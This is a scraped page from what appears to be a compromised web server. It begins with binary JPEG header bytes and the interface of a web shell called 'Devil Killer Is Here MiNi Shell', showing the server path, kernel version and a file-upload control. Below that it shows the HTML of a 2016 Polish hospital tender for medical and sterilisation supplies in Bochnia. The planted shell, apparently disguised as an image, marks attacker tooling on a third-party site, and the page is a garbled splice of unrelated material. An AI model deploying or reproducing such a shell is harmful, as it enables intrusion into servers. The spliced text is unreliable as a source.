JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160610/79293-N-2016.html

<p class="kh_header"><b>Bochnia: Dostawa materiałów medycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 79293 - 2016; data zamieszczenia: 10.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów medycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest Dostawa materiałów medycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni  Szpital Powiatowy im. bł. Marty Wieckiej 
Przedmiot zamówienia został podzielony na 9 pakietów:
Pakiet nr 1 - Papier krepowy, torebki foliowo - papierowe 
Pakiet nr 2 - Testy oraz inne materiały do sterylizacji 
Pakiet nr 3 - Żele, papiery do EKG, KTG 
Pakiet nr 4 - Zamknięty system do nawilżania
Pakiet nr 7 - Paski fluoresceinowe
Pakiet nr 6 - Olej do wiertarek chirurgicznych
Pakiet nr 7 - Żel do gastroenterologii 
Pakiet nr 8 - Jałowy żel do cewnikowania
Pakiet nr 9 - Zestawy chirurgiczne jednorazowe.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">III.5.1)	Oświadczenie Wykonawcy o dopuszczeniu wyrobów medycznych do obrotu i stosowania na terenie Polski (według załącznika nr 6).
III.5.2)	Karta katalogowa lub folder w j. polskim - ze zdjęciem/rysunkiem pozwalająca Zamawiającemu na stwierdzenie spełniania wymaganych parametrów - każda strona musi zostać opisana którego pakietu i pozycji dotyczy.
III.5.3)	Dokument potwierdzający możliwość stosowania zamkniętego system do nawilżania przez okres 30 dni u wielu pacjentów - dotyczy pakietu nr 4</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1)	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
III.6.2)	Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy częściowej - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a.	nazwy produktu przy zachowaniu jego istotnych parametrów,
b.	sposobu konfekcjonowania,
c.	numeru katalogowego poszczególnych Towarów, 
d.	dostarczania innego produktu, przy zachowaniu jego istotnych parametrów, w przypadku ograniczenia dostępności produktu objętego umową, w szczególności zakończenia produkcji oferowanego produktu, wygaśnięcia rejestracji oferowanego produktu, zakazu używania danego produktu wydanego przez właściwy organ,
e.	zmiany terminu realizacji w przypadku nie zrealizowania wartości umowy na poziomie min. 60% w terminie jej obowiązywania, przewiduje się możliwość jej przedłużenia o czas niezbędny do zrealizowania ww. wartości. Przedłużenie terminu obowiązywania umowy może nastąpić na wniosek każdej ze stron. W przypadku braku zgody jednej ze stron na przedłużenie obowiązywania umowy, Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu zmniejszenia Zamówienia.
3.	Wykonawca powinien wykazać okoliczności, o których mowa w ust. 2 .
4.	Wykonawca w sytuacji określonej w ust. 2 pkt c, w porozumieniu z Zamawiającym zaproponuje, w terminie do 5 dni od powzięcia informacji o okolicznościach tam wskazanych, produkt równoważny na zasadach wynikających z ust. 7, z zachowaniem formy pisemnej lub mailowej pod rygorem nieważności.
5.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę ceny za zbiorcze opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w stosunku do ceny jednostkowej poszczególnych Towarów objętej umową
6.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny brutto ulegają zmianie w przypadku wzrostu/spadku stawki podatku VAT. W przypadku urzędowej zmiany stawki VAT, uwzględnienie nowej stawki nastąpi automatycznie w dacie określonej przez właściwe przepisy prawa, bez konieczności zawierania odrębnego aneksu. 
7.	Za zgodą Zamawiającego Wykonawca może zaoferować odpowiednik, po cenie nie wyższej niż cena produktu objętego umową. 
8.	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny.
9.	Zaistnienie okoliczności wymienionych w ust 7-8 nie wymaga sporządzenia aneksu.
10.	W przypadku zmiany bądź rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest niezwłocznie w formie pisemnej wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej
32-700, Bochnia
ul. Krakowska 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2016 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Papier krepowy, torebki foliowo - papierowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Papier krepowy - zielony 100 x 100, gramatura 60-70g/m2, Wyrób spełnijący wymagania norm 868-2	op.	250 arkuszy   	1
2.	Papier krepowy - zielony 120 x 120, gramatura 60-70g/m2, Wyrób spełnijący wymagania norm 868-2	op.	250 arkuszy   	2
3.	Papier krepowy - zielony 90 x 90, gramatura 60-70g/m2, Wyrób spełnający wymagania norm 868-2	op.	250 arkuszy   	22
4.	Papier krepowy - zielony 60 x 60,  gramatura 60-70g/m2	op.	500 arkuszy	3
5.	Papier krepowy - zielony 75 x 75, gramatura 60-70g/m2	op.	250 arkuszy	3
6.	Papier krepowy - naprzemiennie pakowany biały/pomarańczowy lub biały /zielony 60 x 60, gramatura min 70g/m2	op.	500 arkuszy	11
7.	Włóknina niebieska 120 x 120, Wyrób spełnijący wymagania norm PN-EN 868-2, PN-EN ISO 11607-1.                                                                                                     	op.	250 arkuszy	1
8.	Włóknina niebieska 100 x 100, Wyrób spełnijący wymagania norm PN-EN 868-2, PN-EN ISO 11607-1.      	op.	250 arkuszy	2
9.	Włóknina niebieska 90 x 90, Wyrób spełnijący wymagania norm PN-EN 868-2, PN-EN ISO 11607-1.       	op.	250 arkuszy	10
10.	Włóknina niebieska 75 x 75, Wyrób spełnijący wymagania norm PN-EN 868-2, PN-EN ISO 11607-1.      	op.	250 arkuszy	2
11.	Torebki foliowo - papierowe samoprzylepne - wskaźnik sterylizacji para wodna -  90-100 x 200-203 mm, Gramatura min 60g/m2	op.	100 szt.	4
12.	Torebki foliowo - papierowe samoprzylepne - wskaźnik sterylizacji para wodna -  200 x 330-350 mm, gramatura min 60g/m2	op.	100 szt.	2
13.	Torebki foliowo - papierowe samoprzylepne - wskaźnik sterylizacji para wodna  - 100 - 130 x 300 - 356 mm, gramatura min 60g/m2	op.	100 szt. 	2
14.	*Rękaw papierowo-foliowy płaski - 50 mm	rol.	200 m	12
15.	*Rękaw papierowo-foliowy płaski - 75 mm 	rol.	200 m	9
16.	*Rękaw papierowo-foliowy płaski - 100 mm 	rol.	200 m	10
17.	*Rękaw papierowo-foliowy płaski - 120 mm 	rol.	200 m	12
18.	*Rękaw papierowo-foliowy płaski - 150 mm 	rol.	200 m	27
19.	*Rękaw papierowo-foliowy płaski - 200 mm 	rol.	200 m	8
20.	*Rękaw papierowo-foliowy płaski - 250 mm 	rol.	200 m	2
21.	*Rękaw papierowo-foliowy płaski - 300 mm  	rol.	200 m	2
22.	*Rękaw papierowo-foliowy z fałdą  250 mm x 60 - 65 mm, 	rol.	100 m	6
23.	*Rękaw papierowo-foliowy z fałdą 150 mm - 160mm x 25mm - 50 mm, 	rol.	100 m	18
24.	*Rękaw papierowo-foliowy z fałdą 75 mm x 25 - 30 mm, 	rol.	100 m	1
25.	*Rękaw papierowo-foliowy z fałdą  300 mm x 60 - 80mm	rol.	100 m	5
26.	*Rękaw papierowo-foliowy z fałdą   380 - 400mm x 65 - 80mm	rol.	100 m	1
27.	Torebki posterylizacyjne 200 x 300mm, do ochrony pakietów sterylnych, posiadające samoprzylepne zamknięcie. 	op.	500 szt.	3
28.	Torebki posterylizacyjne 300 x 500mm, do ochrony pakietów sterylnych, posiadające samoprzylepne zamknięcie. 	op.	250 szt.	3
29.	Torebki posterylizacyjne 400 x 550mm, do ochrony pakietów sterylnych, posiadające samoprzylepne zamknięcie.  	op.	250 szt.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Testy oraz inne materiały do sterylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia	J.m.	Wielkość opakowania oczekiwana przez Zamawiającego	Ilość zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego - wg kol. 4)
1.	2.	3.	4.	5.
1.	Zestaw testowy typu  Bowie - Dick wielokrotnego użytku - zestaw 2 pakietów serwet  i  arkuszy testowych.  Na czas umowy zamawiający wymaga nieodpłatnego udostępnienia klamry do wymienionych testów w ilości 3 szt. Zamawijący dopuszcza zoferowanie standardowe gotowe testy pakietowe Bowie-Dick, nie wymagające klamer, serwet ani przygotowywania samodzielnego pakietu  	op.	po 25 szt. 	26
2.	Biologiczny wskaźnik kontroli procesu sterylizacji parą wodną AMPUŁKOWY 	op.	100 szt. 	17
3.	Test chemiczny do pary wodnej, wieloparametrowy kl IV*, paskowy, 	op.	500 szt. 	120
4.	Taśma wskaźnikowa 19 mm /do pary wodnej/	rolka	50 m	47
5.	Taśma neutralna 19 mm - maskująca	rolka	50 m	62
6.	Etykiety BROWNE (zamawiający dopuszcza możliwość zastąpienia wymienionych etykiet innym rodzajem pod warunkiem bezpłatnego udostępnienia min. dwóch metkownic na czas umowy)	rolka	500 etykiet	15
7.	Testy do myjni dezynfektorów. Test kontrolujący osiąganie ekspozycji dezynfekcyjnej w zakresie 93°C w czasie 10 minut.	op.	100 szt. 	8
8.	Koperty BROWNE 32 - 23 cm (zamawiający dopuszcza inny rodzaj kopert umożliwiający archiwizacje dzienną dwóch sterylizatorów min. 5 cykli na jednej stronie koperty)	op.	100 szt. 	3
9.	Mazaki typu MARKER do opisu pakietów-różnych grubości	szt.	1	40
10.	Biologiczny wskaźnik kontroli procesu sterylizacji na suche gorące powietrze	szt.	1	10
11.	Taśma wskaźnikowa do suchego gorącego powietrza	rolka	50 m	1
12.	Chemiczne testy do kontroli warunków sterylizacji na suche gorące powietrze 	szt.	1	100
13.	Gotowe testy sprawdzające skuteczność procesów mycia oraz efektywność działania detergentów w myjniach - dezynfektorach każdego typu , substancja wskaźnikowa umieszczona na teście naśladująca pozostałości zaschniętej krwi oraz tkanek, testy zabezpieczone 	op.	100 szt. 	2
14.	Wskaźnik wieloparametrowy do sterylizacji parą wodną - samoprzylepny - DOCUMENT - KLASY VI    7/20 / posiadają odpowiednie parametry potrzebne do kontroli autoklawów pracujących obecnie  w Centralnej Sterylizatorni /	op.	100 szt. 	15
